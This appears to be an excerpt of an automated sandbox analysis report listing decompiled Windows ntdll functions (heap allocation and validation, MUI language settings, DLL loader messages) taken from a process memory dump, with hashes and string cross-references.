                                                • API String ID: 0-523794902
                                                • Opcode ID: 176a6c6e6acf5cc8c34c16f9b98620bea6320cc929ddae10549fa431bed34868
                                                • Instruction ID: 28e4ec4f07067abe8bd84ef0266e21406e0a62dda3106cb8b2ccc260e21cac59
                                                • Opcode Fuzzy Hash: 176a6c6e6acf5cc8c34c16f9b98620bea6320cc929ddae10549fa431bed34868
                                                • Instruction Fuzzy Hash: BB4211722083819FD715CF28D984B2BBBE5FF88608F44496EF5868B361DB74D981CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E01472D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int _t83;
                                                				signed char _t89;
                                                				intOrPtr _t90;
                                                				signed char _t101;
                                                				signed int _t102;
                                                				intOrPtr _t104;
                                                				signed int _t105;
                                                				signed int _t106;
                                                				intOrPtr _t108;
                                                				intOrPtr _t112;
                                                				short* _t130;
                                                				short _t131;
                                                				signed int _t148;
                                                				intOrPtr _t149;
                                                				signed int* _t154;
                                                				short* _t165;
                                                				signed int _t171;
                                                				void* _t182;
                                                
                                                				_push(0x44);
                                                				_push(0x1490e80);
                                                				E0140D0E8(__ebx, __edi, __esi);
                                                				_t177 = __edx;
                                                				_t181 = __ecx;
                                                				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                                                				 *((char*)(_t182 - 0x1d)) = 0;
                                                				 *(_t182 - 0x24) = 0;
                                                				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                					 *((intOrPtr*)(_t182 - 4)) = 0;
                                                					 *((intOrPtr*)(_t182 - 4)) = 1;
                                                					_t83 = E013B40E1("RtlAllocateHeap");
                                                					__eflags = _t83;
                                                					if(_t83 == 0) {
                                                						L48:
                                                						 *(_t182 - 0x24) = 0;
                                                						L49:
                                                						 *((intOrPtr*)(_t182 - 4)) = 0;
                                                						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                                                						E014730C4();
                                                						goto L50;
                                                					}
                                                					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                                                					 *(_t182 - 0x28) = _t89;
                                                					 *(_t182 - 0x3c) = _t89;
                                                					_t177 =  *(_t182 + 8);
                                                					__eflags = _t177;
                                                					if(_t177 == 0) {
                                                						_t171 = 1;
                                                						__eflags = 1;
                                                					} else {
                                                						_t171 = _t177;
                                                					}
                                                					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                                                					__eflags = _t148 - 0x10;
                                                					if(_t148 < 0x10) {
                                                						_t148 = 0x10;
                                                					}
                                                					_t149 = _t148 + 8;
                                                					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                                                					__eflags = _t149 - _t177;
                                                					if(_t149 < _t177) {
                                                						L44:
                                                						_t90 =  *[fs:0x30];
                                                						__eflags =  *(_t90 + 0xc);
                                                						if( *(_t90 + 0xc) == 0) {
                                                							_push("HEAP: ");
                                                							E013BB150();
                                                						} else {
                                                							E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                						}
                                                						_push( *((intOrPtr*)(_t181 + 0x78)));
                                                						E013BB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                                                						goto L48;
                                                					} else {
                                                						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                                                						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                                                							goto L44;
                                                						}
                                                						__eflags = _t89 & 0x00000001;
                                                						if((_t89 & 0x00000001) != 0) {
                                                							_t178 =  *(_t182 - 0x28);
                                                						} else {
                                                							E013CEEF0( *((intOrPtr*)(_t181 + 0xc8)));
                                                							 *((char*)(_t182 - 0x1d)) = 1;
                                                							_t178 =  *(_t182 - 0x28) | 0x00000001;
                                                							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                                                						}
                                                						E01474496(_t181, 0);
                                                						_t177 = L013D4620(_t181, _t181, _t178,  *(_t182 + 8));
                                                						 *(_t182 - 0x24) = _t177;
                                                						_t173 = 1;
                                                						E014749A4(_t181);
                                                						__eflags = _t177;
                                                						if(_t177 == 0) {
                                                							goto L49;
                                                						} else {
                                                							_t177 = _t177 + 0xfffffff8;
                                                							__eflags =  *((char*)(_t177 + 7)) - 5;
                                                							if( *((char*)(_t177 + 7)) == 5) {
                                                								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                                                								__eflags = _t177;
                                                							}
                                                							_t154 = _t177;
                                                							 *(_t182 - 0x40) = _t177;
                                                							__eflags =  *(_t181 + 0x4c);
                                                							if( *(_t181 + 0x4c) != 0) {
                                                								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                                                								if(__eflags != 0) {
                                                									_push(_t154);
                                                									_t173 = _t177;
                                                									E0146FA2B(0, _t181, _t177, _t177, _t181, __eflags);
                                                								}
                                                							}
                                                							__eflags =  *(_t177 + 2) & 0x00000002;
                                                							if(( *(_t177 + 2) & 0x00000002) == 0) {
                                                								_t101 =  *(_t177 + 3);
                                                								 *(_t182 - 0x29) = _t101;
                                                								_t102 = _t101 & 0x000000ff;
                                                							} else {
                                                								_t130 = E013B1F5B(_t177);
                                                								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                                                								__eflags =  *(_t181 + 0x40) & 0x08000000;
                                                								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                                                									 *_t130 = 0;
                                                								} else {
                                                									_t131 = E013E16C7(1, _t173);
                                                									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                                                									 *_t165 = _t131;
                                                									_t130 = _t165;
                                                								}
                                                								_t102 =  *(_t130 + 2) & 0x0000ffff;
                                                							}
                                                							 *(_t182 - 0x34) = _t102;
                                                							 *(_t182 - 0x28) = _t102;
                                                							__eflags =  *(_t181 + 0x4c);
                                                							if( *(_t181 + 0x4c) != 0) {
                                                								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                                                								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                								__eflags =  *_t177;
                                                							}
                                                							__eflags =  *(_t181 + 0x40) & 0x20000000;
                                                							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                                                								__eflags = 0;
                                                								E01474496(_t181, 0);
                                                							}
                                                							__eflags =  *(_t182 - 0x24) -  *0x14a6360; // 0x0
                                                							_t104 =  *[fs:0x30];
                                                							if(__eflags != 0) {
                                                								_t105 =  *(_t104 + 0x68);
                                                								 *(_t182 - 0x4c) = _t105;
                                                								__eflags = _t105 & 0x00000800;
                                                								if((_t105 & 0x00000800) == 0) {
                                                									goto L49;
                                                								}
                                                								_t106 =  *(_t182 - 0x34);
                                                								__eflags = _t106;
                                                								if(_t106 == 0) {
                                                									goto L49;
                                                								}
                                                								__eflags = _t106 -  *0x14a6364; // 0x0
                                                								if(__eflags != 0) {
                                                									goto L49;
                                                								}
                                                								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x14a6366; // 0x0
                                                								if(__eflags != 0) {
                                                									goto L49;
                                                								}
                                                								_t108 =  *[fs:0x30];
                                                								__eflags =  *(_t108 + 0xc);
                                                								if( *(_t108 + 0xc) == 0) {
                                                									_push("HEAP: ");
                                                									E013BB150();
                                                								} else {
                                                									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                								}
                                                								_push(E0145D455(_t181,  *(_t182 - 0x28)));
                                                								_push( *(_t182 + 8));
                                                								E013BB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                                                								goto L34;
                                                							} else {
                                                								__eflags =  *(_t104 + 0xc);
                                                								if( *(_t104 + 0xc) == 0) {
                                                									_push("HEAP: ");
                                                									E013BB150();
                                                								} else {
                                                									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                								}
                                                								_push( *(_t182 + 8));
                                                								E013BB150("Just allocated block at %p for %Ix bytes\n",  *0x14a6360);
                                                								L34:
                                                								_t112 =  *[fs:0x30];
                                                								__eflags =  *((char*)(_t112 + 2));
                                                								if( *((char*)(_t112 + 2)) != 0) {
                                                									 *0x14a6378 = 1;
                                                									 *0x14a60c0 = 0;
                                                									asm("int3");
                                                									 *0x14a6378 = 0;
                                                								}
                                                								goto L49;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					_t181 =  *0x14a5708; // 0x0
                                                					 *0x14ab1e0(__ecx, __edx,  *(_t182 + 8));
                                                					 *_t181();
                                                					L50:
                                                					return E0140D130(0, _t177, _t181);
                                                				}
                                                			}






















                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                • API String ID: 0-1745908468
                                                • Opcode ID: 792700cdff80609c220cdde37f858b66541aec078b33fa0e111b99c97ac9f295
                                                • Instruction ID: e21e9cdde5cc45ffd74bd8a4e55f490c55a4e09948ba3c39152ce4e11571e1be
                                                • Opcode Fuzzy Hash: 792700cdff80609c220cdde37f858b66541aec078b33fa0e111b99c97ac9f295
                                                • Instruction Fuzzy Hash: 74912171A00681DFDB22DFA9C454AEEBFF2FF58614F08801EE5465B7A1C7769842DB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E013C3D34(signed int* __ecx) {
                                                				signed int* _v8;
                                                				char _v12;
                                                				signed int* _v16;
                                                				signed int* _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				char _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int* _v48;
                                                				signed int* _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				char _v68;
                                                				signed int _t140;
                                                				signed int _t161;
                                                				signed int* _t236;
                                                				signed int* _t242;
                                                				signed int* _t243;
                                                				signed int* _t244;
                                                				signed int* _t245;
                                                				signed int _t255;
                                                				void* _t257;
                                                				signed int _t260;
                                                				void* _t262;
                                                				signed int _t264;
                                                				void* _t267;
                                                				signed int _t275;
                                                				signed int* _t276;
                                                				short* _t277;
                                                				signed int* _t278;
                                                				signed int* _t279;
                                                				signed int* _t280;
                                                				short* _t281;
                                                				signed int* _t282;
                                                				short* _t283;
                                                				signed int* _t284;
                                                				void* _t285;
                                                
                                                				_v60 = _v60 | 0xffffffff;
                                                				_t280 = 0;
                                                				_t242 = __ecx;
                                                				_v52 = __ecx;
                                                				_v8 = 0;
                                                				_v20 = 0;
                                                				_v40 = 0;
                                                				_v28 = 0;
                                                				_v32 = 0;
                                                				_v44 = 0;
                                                				_v56 = 0;
                                                				_t275 = 0;
                                                				_v16 = 0;
                                                				if(__ecx == 0) {
                                                					_t280 = 0xc000000d;
                                                					_t140 = 0;
                                                					L50:
                                                					 *_t242 =  *_t242 | 0x00000800;
                                                					_t242[0x13] = _t140;
                                                					_t242[0x16] = _v40;
                                                					_t242[0x18] = _v28;
                                                					_t242[0x14] = _v32;
                                                					_t242[0x17] = _t275;
                                                					_t242[0x15] = _v44;
                                                					_t242[0x11] = _v56;
                                                					_t242[0x12] = _v60;
                                                					return _t280;
                                                				}
                                                				if(E013C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                					_v56 = 1;
                                                					if(_v8 != 0) {
                                                						L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                					}
                                                					_v8 = _t280;
                                                				}
                                                				if(E013C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                					_v60 =  *_v8;
                                                					L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                					_v8 = _t280;
                                                				}
                                                				if(E013C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                					L16:
                                                					if(E013C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                						L28:
                                                						if(E013C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                							L46:
                                                							_t275 = _v16;
                                                							L47:
                                                							_t161 = 0;
                                                							L48:
                                                							if(_v8 != 0) {
                                                								L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                							}
                                                							_t140 = _v20;
                                                							if(_t140 != 0) {
                                                								if(_t275 != 0) {
                                                									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                									_t275 = 0;
                                                									_v28 = 0;
                                                									_t140 = _v20;
                                                								}
                                                							}
                                                							goto L50;
                                                						}
                                                						_t167 = _v12;
                                                						_t255 = _v12 + 4;
                                                						_v44 = _t255;
                                                						if(_t255 == 0) {
                                                							_t276 = _t280;
                                                							_v32 = _t280;
                                                						} else {
                                                							_t276 = L013D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                							_t167 = _v12;
                                                							_v32 = _t276;
                                                						}
                                                						if(_t276 == 0) {
                                                							_v44 = _t280;
                                                							_t280 = 0xc0000017;
                                                							goto L46;
                                                						} else {
                                                							E013FF3E0(_t276, _v8, _t167);
                                                							_v48 = _t276;
                                                							_t277 = E01401370(_t276, 0x1394e90);
                                                							_pop(_t257);
                                                							if(_t277 == 0) {
                                                								L38:
                                                								_t170 = _v48;
                                                								if( *_v48 != 0) {
                                                									E013FBB40(0,  &_v68, _t170);
                                                									if(L013C43C0( &_v68,  &_v24) != 0) {
                                                										_t280 =  &(_t280[0]);
                                                									}
                                                								}
                                                								if(_t280 == 0) {
                                                									_t280 = 0;
                                                									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                									_v44 = 0;
                                                									_v32 = 0;
                                                								} else {
                                                									_t280 = 0;
                                                								}
                                                								_t174 = _v8;
                                                								if(_v8 != 0) {
                                                									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                								}
                                                								_v8 = _t280;
                                                								goto L46;
                                                							}
                                                							_t243 = _v48;
                                                							do {
                                                								 *_t277 = 0;
                                                								_t278 = _t277 + 2;
                                                								E013FBB40(_t257,  &_v68, _t243);
                                                								if(L013C43C0( &_v68,  &_v24) != 0) {
                                                									_t280 =  &(_t280[0]);
                                                								}
                                                								_t243 = _t278;
                                                								_t277 = E01401370(_t278, 0x1394e90);
                                                								_pop(_t257);
                                                							} while (_t277 != 0);
                                                							_v48 = _t243;
                                                							_t242 = _v52;
                                                							goto L38;
                                                						}
                                                					}
                                                					_t191 = _v12;
                                                					_t260 = _v12 + 4;
                                                					_v28 = _t260;
                                                					if(_t260 == 0) {
                                                						_t275 = _t280;
                                                						_v16 = _t280;
                                                					} else {
                                                						_t275 = L013D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                						_t191 = _v12;
                                                						_v16 = _t275;
                                                					}
                                                					if(_t275 == 0) {
                                                						_v28 = _t280;
                                                						_t280 = 0xc0000017;
                                                						goto L47;
                                                					} else {
                                                						E013FF3E0(_t275, _v8, _t191);
                                                						_t285 = _t285 + 0xc;
                                                						_v48 = _t275;
                                                						_t279 = _t280;
                                                						_t281 = E01401370(_v16, 0x1394e90);
                                                						_pop(_t262);
                                                						if(_t281 != 0) {
                                                							_t244 = _v48;
                                                							do {
                                                								 *_t281 = 0;
                                                								_t282 = _t281 + 2;
                                                								E013FBB40(_t262,  &_v68, _t244);
                                                								if(L013C43C0( &_v68,  &_v24) != 0) {
                                                									_t279 =  &(_t279[0]);
                                                								}
                                                								_t244 = _t282;
                                                								_t281 = E01401370(_t282, 0x1394e90);
                                                								_pop(_t262);
                                                							} while (_t281 != 0);
                                                							_v48 = _t244;
                                                							_t242 = _v52;
                                                						}
                                                						_t201 = _v48;
                                                						_t280 = 0;
                                                						if( *_v48 != 0) {
                                                							E013FBB40(_t262,  &_v68, _t201);
                                                							if(L013C43C0( &_v68,  &_v24) != 0) {
                                                								_t279 =  &(_t279[0]);
                                                							}
                                                						}
                                                						if(_t279 == 0) {
                                                							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                							_v28 = _t280;
                                                							_v16 = _t280;
                                                						}
                                                						_t202 = _v8;
                                                						if(_v8 != 0) {
                                                							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                						}
                                                						_v8 = _t280;
                                                						goto L28;
                                                					}
                                                				}
                                                				_t214 = _v12;
                                                				_t264 = _v12 + 4;
                                                				_v40 = _t264;
                                                				if(_t264 == 0) {
                                                					_v20 = _t280;
                                                				} else {
                                                					_t236 = L013D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                					_t280 = _t236;
                                                					_v20 = _t236;
                                                					_t214 = _v12;
                                                				}
                                                				if(_t280 == 0) {
                                                					_t161 = 0;
                                                					_t280 = 0xc0000017;
                                                					_v40 = 0;
                                                					goto L48;
                                                				} else {
                                                					E013FF3E0(_t280, _v8, _t214);
                                                					_t285 = _t285 + 0xc;
                                                					_v48 = _t280;
                                                					_t283 = E01401370(_t280, 0x1394e90);
                                                					_pop(_t267);
                                                					if(_t283 != 0) {
                                                						_t245 = _v48;
                                                						do {
                                                							 *_t283 = 0;
                                                							_t284 = _t283 + 2;
                                                							E013FBB40(_t267,  &_v68, _t245);
                                                							if(L013C43C0( &_v68,  &_v24) != 0) {
                                                								_t275 = _t275 + 1;
                                                							}
                                                							_t245 = _t284;
                                                							_t283 = E01401370(_t284, 0x1394e90);
                                                							_pop(_t267);
                                                						} while (_t283 != 0);
                                                						_v48 = _t245;
                                                						_t242 = _v52;
                                                					}
                                                					_t224 = _v48;
                                                					_t280 = 0;
                                                					if( *_v48 != 0) {
                                                						E013FBB40(_t267,  &_v68, _t224);
                                                						if(L013C43C0( &_v68,  &_v24) != 0) {
                                                							_t275 = _t275 + 1;
                                                						}
                                                					}
                                                					if(_t275 == 0) {
                                                						L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                						_v40 = _t280;
                                                						_v20 = _t280;
                                                					}
                                                					_t225 = _v8;
                                                					if(_v8 != 0) {
                                                						L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                					}
                                                					_v8 = _t280;
                                                					goto L16;
                                                				}
                                                			}


                                                Strings
                                                • WindowsExcludedProcs, xrefs: 013C3D6F
                                                • Kernel-MUI-Language-SKU, xrefs: 013C3F70
                                                • Kernel-MUI-Language-Allowed, xrefs: 013C3DC0
                                                • Kernel-MUI-Language-Disallowed, xrefs: 013C3E97
                                                • Kernel-MUI-Number-Allowed, xrefs: 013C3D8C
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 0-258546922
                                                • Opcode ID: 556755c5bd2eea67af5010e2efa7f6d9cdab52eec11164535239daabad7d52b3
                                                • Instruction ID: 6c0078297ccae7bf674ecb7144b11400e888aea194efcf9b197e8611b7c126f2
                                                • Opcode Fuzzy Hash: 556755c5bd2eea67af5010e2efa7f6d9cdab52eec11164535239daabad7d52b3
                                                • Instruction Fuzzy Hash: 26F14E72D0021AEFDB12DF98C980EEFBBB9FF58A54F15406AE905A7250D7349E01CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 29%
                                                			E013B40E1(void* __edx) {
                                                				void* _t19;
                                                				void* _t29;
                                                
                                                				_t28 = _t19;
                                                				_t29 = __edx;
                                                				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push("HEAP: ");
                                                						E013BB150();
                                                					} else {
                                                						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					E013BB150("Invalid heap signature for heap at %p", _t28);
                                                					if(_t29 != 0) {
                                                						E013BB150(", passed to %s", _t29);
                                                					}
                                                					_push("\n");
                                                					E013BB150();
                                                					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                						 *0x14a6378 = 1;
                                                						asm("int3");
                                                						 *0x14a6378 = 0;
                                                					}
                                                					return 0;
                                                				}
                                                				return 1;
                                                			}


                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                • API String ID: 0-188067316
                                                • Opcode ID: 210a7d9f9451cfac4c976eac90b749814c184287492acfe1dfab77c7d7eae38d
                                                • Instruction ID: e08c18edc036732c1bb5a1541a5c1fd32d663efef0f15f2fac0737e2e91bc7ec
                                                • Opcode Fuzzy Hash: 210a7d9f9451cfac4c976eac90b749814c184287492acfe1dfab77c7d7eae38d
                                                • Instruction Fuzzy Hash: E8014C721412419EE325976EE49EF92BBA8DB00B38F19803EF10547B55EEF89480C214
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: dfa3a86c1ff18873f1fe638bb0e84c7d0785f181fc3411a796d5e568e7535085
                                                • Instruction ID: f431bab5993b904da84d6049f399df9018e728739d5dad3127cbd069c74fa49d
                                                • Opcode Fuzzy Hash: dfa3a86c1ff18873f1fe638bb0e84c7d0785f181fc3411a796d5e568e7535085
                                                • Instruction Fuzzy Hash: FA23C1B1A00219DFDB15CF68D4807ADBBF5FF49308F1481AAE85AAB356D734A846CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • HEAP: , xrefs: 014222E6, 014223F6
                                                • HEAP[%wZ]: , xrefs: 014222D7, 014223E7
                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01422403
                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 014222F3
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                • API String ID: 0-1657114761
                                                • Opcode ID: 323c5a6339921f77e7b3d5f0f903916f9bcef4e7c00fe710c69ff97f779cf9fc
                                                • Instruction ID: fe678e065b5f59d5561b381cc0e1689a3cd7ee5df730b25a52928bab159627c2
                                                • Opcode Fuzzy Hash: 323c5a6339921f77e7b3d5f0f903916f9bcef4e7c00fe710c69ff97f779cf9fc
                                                • Instruction Fuzzy Hash: 1DD10175A0020A8FEB19CF6CD680BBABBF1FF48308F158569D9569B742E334E941CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                • API String ID: 2994545307-2586055223
                                                • Opcode ID: f1394535976387fe6c773712499ca1b55792773ed806db28aa85dc36ca63f599
                                                • Instruction ID: 9c3f59ef16f5fe7b1386c5fe55b1338f363018a145da4f1e2e781c7dc9f09131
                                                • Opcode Fuzzy Hash: f1394535976387fe6c773712499ca1b55792773ed806db28aa85dc36ca63f599
                                                • Instruction Fuzzy Hash: E75135322046919FE322EB6DD944F677BE8FF84B58F080469F5518B3A1D734E941CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 01429357
                                                • minkernel\ntdll\ldrsnap.c, xrefs: 0142933B, 01429367
                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0142932A
                                                • LdrpFindDllActivationContext, xrefs: 01429331, 0142935D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 0-3779518884
                                                • Opcode ID: f4a030a45c67b06b60eeb24903901017511a11c9e1b1f919fc4b9b5c04b4b40e
                                                • Instruction ID: a5521a44c0b378aae0dad6668ad07bc343945e7c0f42adfccc817e3a63ab77ca
                                                • Opcode Fuzzy Hash: f4a030a45c67b06b60eeb24903901017511a11c9e1b1f919fc4b9b5c04b4b40e
                                                • Instruction Fuzzy Hash: DB412932E003359EEF35AA5DC84DA76BAE4AB8425CF4645EAD90C575E1E770AD8083C1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                • API String ID: 2994545307-336120773
                                                • Opcode ID: 4b1c1867d1b2af0da111422d984be863fae0df8496eda04e18b9d702bcc1d7a9
                                                • Instruction ID: 05673acee5e5d7937a712ba7ce90270508450b8f51f13cf47d23524f50e694eb
                                                • Opcode Fuzzy Hash: 4b1c1867d1b2af0da111422d984be863fae0df8496eda04e18b9d702bcc1d7a9
                                                • Instruction Fuzzy Hash: 56312871100151EFDB21EBADC885FF7B7ACEF04628F18405AF505DB361EA74A944CB68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 44fce0629ced90a466c3a93bf3236c2671a543b829181fa8ad01e2f2887dbc6e
                                                • Instruction ID: 4aaf2074cbb7b49eb56351cb33526a0b12f98ae13bf8e6f2f9f5ca5888bdb435
                                                • Opcode Fuzzy Hash: 44fce0629ced90a466c3a93bf3236c2671a543b829181fa8ad01e2f2887dbc6e
                                                • Instruction Fuzzy Hash: 3E2212706002569FEB25CF2DC484B7ABBB5EF44B08F18856EE8468B366E775D881CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: 1e13d30149a327eed0c4b23674b57c458410396d9964d550b9f162935ff1339f
                                                • Instruction ID: 7bd88a8b431e06535b0a6dc8ebc96c512f7df9ede694d5cc68c98ca2555fdefe
                                                • Opcode Fuzzy Hash: 1e13d30149a327eed0c4b23674b57c458410396d9964d550b9f162935ff1339f
                                                • Instruction Fuzzy Hash: 99E19A71B00209DFDB19CF68D884FAABBB5FF49308F1541AAE5029B7A5D770E981CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • minkernel\ntdll\ldrsnap.c, xrefs: 01419C28
                                                • LdrpDoPostSnapWork, xrefs: 01419C1E
                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01419C18
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 2994545307-1948996284
